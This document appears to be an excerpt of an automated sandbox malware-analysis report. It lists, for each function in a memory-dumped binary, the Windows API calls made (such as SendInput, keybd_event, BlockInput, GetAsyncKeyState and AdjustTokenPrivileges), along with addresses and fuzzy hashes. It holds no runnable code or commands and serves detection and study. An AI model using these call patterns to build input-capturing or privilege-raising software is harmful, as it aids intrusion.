                                                                                                                  • Instruction ID: afe820835e390e455750c143e5b7b76621ea57a947a080f67526ec2139d0f231
                                                                                                                  • Opcode Fuzzy Hash: bc3ff812f64d59952ab0b89a9c933f167c5fd407407daf5c9ae5bab72cffa9da
                                                                                                                  • Instruction Fuzzy Hash: D1118EB1900329BFE7109BAC9C45FEFBBBDEB08754F014656B901E7290D2B49A0487F1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • GetParent.USER32(?), ref: 00DEF4B5
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00D8ADDD,?,?,?,00000006,?), ref: 00DEF52F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314495775-0
                                                                                                                  • Opcode ID: fc14e66dae9b06bdb3b2134bac9519243c8abeda2b4ca4518568ce4a9fa9e029
                                                                                                                  • Instruction ID: cd9452aea586d92b19b9f9da49030f3fb3b17e93fad750c48cb99283507ac538
                                                                                                                  • Opcode Fuzzy Hash: fc14e66dae9b06bdb3b2134bac9519243c8abeda2b4ca4518568ce4a9fa9e029
                                                                                                                  • Instruction Fuzzy Hash: 33219631200144AFDB29AF29C849AAA3BA6EF46370F1C4265F5295B2E2C7309D11D730
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00DEF352,?,?,?), ref: 00DDF115
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DDF0FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1273190321-0
                                                                                                                  • Opcode ID: 7c414f38c5c101d9b5baf9e1c810da89b6bd1b83df4770e1dbf51a341d4b867d
                                                                                                                  • Instruction ID: 3c3aa729d7a69d2a82de1adf8ab5627ab71cd52f006e5db318dffa2cbab83a56
                                                                                                                  • Opcode Fuzzy Hash: 7c414f38c5c101d9b5baf9e1c810da89b6bd1b83df4770e1dbf51a341d4b867d
                                                                                                                  • Instruction Fuzzy Hash: 39019E31200304EBDB25AF15DC49F6A3FA7FB85364F18416AF95A5B3A1C731A806DB70
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00DDF47D
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00DEF42E,?,?,?,?,?), ref: 00DDF4A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3420055661-0
                                                                                                                  • Opcode ID: 4b20dbc3870e79555e9f40f2ab4516790bd1a6c22616cd91b7184a936fcf46dc
                                                                                                                  • Instruction ID: 1306bfb5a1242ef5acd34aefc34135dbb7f2c72befa4ef7648a0db938d7f299c
                                                                                                                  • Opcode Fuzzy Hash: 4b20dbc3870e79555e9f40f2ab4516790bd1a6c22616cd91b7184a936fcf46dc
                                                                                                                  • Instruction Fuzzy Hash: F3F01772400218BFEB049F95DC099BEBFBAFF44351F14805AF902A2260D7B5AA55EB70
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DCC2E2,?,?,00000000,?), ref: 00DBD73F
                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DCC2E2,?,?,00000000,?), ref: 00DBD751
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479602957-0
                                                                                                                  • Opcode ID: 60601a5f3ed598724fa5e36274728594da894cd9888b556ebab3a69f3e91f928
                                                                                                                  • Instruction ID: 162cbe92d032254b1b85d3c7efd0bfcfdf3c603cc8c721934a91be783bcced69
                                                                                                                  • Opcode Fuzzy Hash: 60601a5f3ed598724fa5e36274728594da894cd9888b556ebab3a69f3e91f928
                                                                                                                  • Instruction Fuzzy Hash: 60F08C3510032DABDB21AFA4CC49FEA7BAEEF49761F008155B90AD6181E630DA40CBB0
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DB4B89
                                                                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00DB4B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3536248340-0
                                                                                                                  • Opcode ID: ca8aa808f0620da02439be818c61f36198d12546b7f6e535c5aa8eabb7be1611
                                                                                                                  • Instruction ID: 84250a71d532eb22a05838a3a3b6bce42f534f8255f2325c3c65c4b745f7945c
                                                                                                                  • Opcode Fuzzy Hash: ca8aa808f0620da02439be818c61f36198d12546b7f6e535c5aa8eabb7be1611
                                                                                                                  • Instruction Fuzzy Hash: FFF06D7080434DAFDB058FA0C805BBE7BB5AF00305F04C409F951A5292D779C615DFA4
                                                                                                                  APIs
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DAB9EC), ref: 00DAB8C5
                                                                                                                  • CloseHandle.KERNEL32(?,?,00DAB9EC), ref: 00DAB8D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 81990902-0
                                                                                                                  • Opcode ID: 0ea6ad297ce0b1e5f46c3719d194b3e156015a73c1591834fb224cdfbc2027d4
                                                                                                                  • Instruction ID: 02368e575cf5e4577d4878b10c16d726073fddbf166d2cfffd54f3399947b266
                                                                                                                  • Opcode Fuzzy Hash: 0ea6ad297ce0b1e5f46c3719d194b3e156015a73c1591834fb224cdfbc2027d4
                                                                                                                  • Instruction Fuzzy Hash: 76E0B672004711EEEB262B64FC09D767BEAEF04321B14C92AF496C1470DB62ACD1DB30
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00DDF59C
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00DEF3AD,?,?,?,?), ref: 00DDF5C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 2d8862490712b1948d55e3c695f2a2767a783be5cd74008f6e71339305eb8991
                                                                                                                  • Instruction ID: e307f43e3109f18aa76ab1ff8c2e305e89523fdd983aac9ab05863e8efee88a8
                                                                                                                  • Opcode Fuzzy Hash: 2d8862490712b1948d55e3c695f2a2767a783be5cd74008f6e71339305eb8991
                                                                                                                  • Instruction Fuzzy Hash: 60E08C30104218BBEB140F09EC0AFB93B1AEB00B50F108526F957C81E0D7B099A0E670
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00D7125D,00D97A43,00D70F35,?,?,00000001), ref: 00D98E41
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D98E4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 14613875f3c9b7ea7128167322349678299b8c58bd268935da9cab2824c6b65c
                                                                                                                  • Instruction ID: 5b32949d6c64c6fac62d889ca06716e4e20595d2925d2a92007262ab9f6a1a61
                                                                                                                  • Opcode Fuzzy Hash: 14613875f3c9b7ea7128167322349678299b8c58bd268935da9cab2824c6b65c
                                                                                                                  • Instruction Fuzzy Hash: 15B09271048B08ABEB002BA1FC09BA83FABEB08A62F008010F71D842608B635450CAA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d369fbf1d86d14a9a22975a4e41b83b3f082e841d63b14ef13b7881d7717ffe3
                                                                                                                  • Instruction ID: 0139531fd36824d7ca0698f873bf0f940d245d748be376f6fdfd0ea408e596e9
                                                                                                                  • Opcode Fuzzy Hash: d369fbf1d86d14a9a22975a4e41b83b3f082e841d63b14ef13b7881d7717ffe3
                                                                                                                  • Instruction Fuzzy Hash: 6AB1CD21D2AF404DD623963A8835336B65CAFBB3C5F91D71BFC6A70D62EB2285C74580
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00DE0352
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: c7bfb55e100c2c37f71985aab2d1a2c431b761ba3c3edd0a59f8cf6e589094a7
                                                                                                                  • Instruction ID: 3574ede3fe238f6ae245461c8af1966728ab78900df2055ed49d3ac7ba6a2a2c
                                                                                                                  • Opcode Fuzzy Hash: c7bfb55e100c2c37f71985aab2d1a2c431b761ba3c3edd0a59f8cf6e589094a7
                                                                                                                  • Instruction Fuzzy Hash: 09112B31204295BBFB252B2D8C4AF793E15D745720F244315F922591E2CAE49D40D279
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00DDE7AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4084987330-0
                                                                                                                  • Opcode ID: 964c54f89a667264bb32dedcbad72064ac326789f6bd5691954bf1115be91193
                                                                                                                  • Instruction ID: edb9bd6c16780b9d0d6bd60a92f299464366601fec8b1ec830f87d4a31959040
                                                                                                                  • Opcode Fuzzy Hash: 964c54f89a667264bb32dedcbad72064ac326789f6bd5691954bf1115be91193
                                                                                                                  • Instruction Fuzzy Hash: 3DF0FF3510020CFFCF49AF55DC44DB93BA6EB05360B048555F9559A7A1C732ED60EB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00DEF417,?,?,?,?,?,00000001,?), ref: 00DDEA9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2356834413-0
                                                                                                                  • Opcode ID: dd35cdf9e2e4dffb66d93859b7821741ee1b2fcd29f479cf517e47e8678255ae
                                                                                                                  • Instruction ID: d79ea7c7d0d805d9391517d9c52fe7665b5f2adc3ba9e55a9af3710527f98327
                                                                                                                  • Opcode Fuzzy Hash: dd35cdf9e2e4dffb66d93859b7821741ee1b2fcd29f479cf517e47e8678255ae
                                                                                                                  • Instruction Fuzzy Hash: EEF0A771100319ABDB147F19CC0AEBA3F61FB00750F444016F9061E291D776D861DBF1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00D8AF40,?,?,?,?,?), ref: 00D8B83B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 253fa9d7ebdee3145232ec1af15b770c463d3636a37991325bea49d8050eb2d9
                                                                                                                  • Instruction ID: 87ba1abf13cfd409d86b1afe595c9ff8ced8aec25d39b47af151f7a32b60b5f3
                                                                                                                  • Opcode Fuzzy Hash: 253fa9d7ebdee3145232ec1af15b770c463d3636a37991325bea49d8050eb2d9
                                                                                                                  • Instruction Fuzzy Hash: 6EF08234600209DFDB18EF19D8959353FB6FB45360F14866DF9524B2A0D771D850DB64
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 00DC7057
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: b957f043180484acf4317e81989f0cd4734e2cb2545790af695be3da8630b9ef
                                                                                                                  • Instruction ID: b9223cd799524a234838c7445054f9cdb83b0d7dd209344800845bbc28075f8b
                                                                                                                  • Opcode Fuzzy Hash: b957f043180484acf4317e81989f0cd4734e2cb2545790af695be3da8630b9ef
                                                                                                                  • Instruction Fuzzy Hash: 1EE048752142055FC710EFA9D408E96F7EDDF54750F00C42AF949D7351DAB0E8009BB0
                                                                                                                  APIs
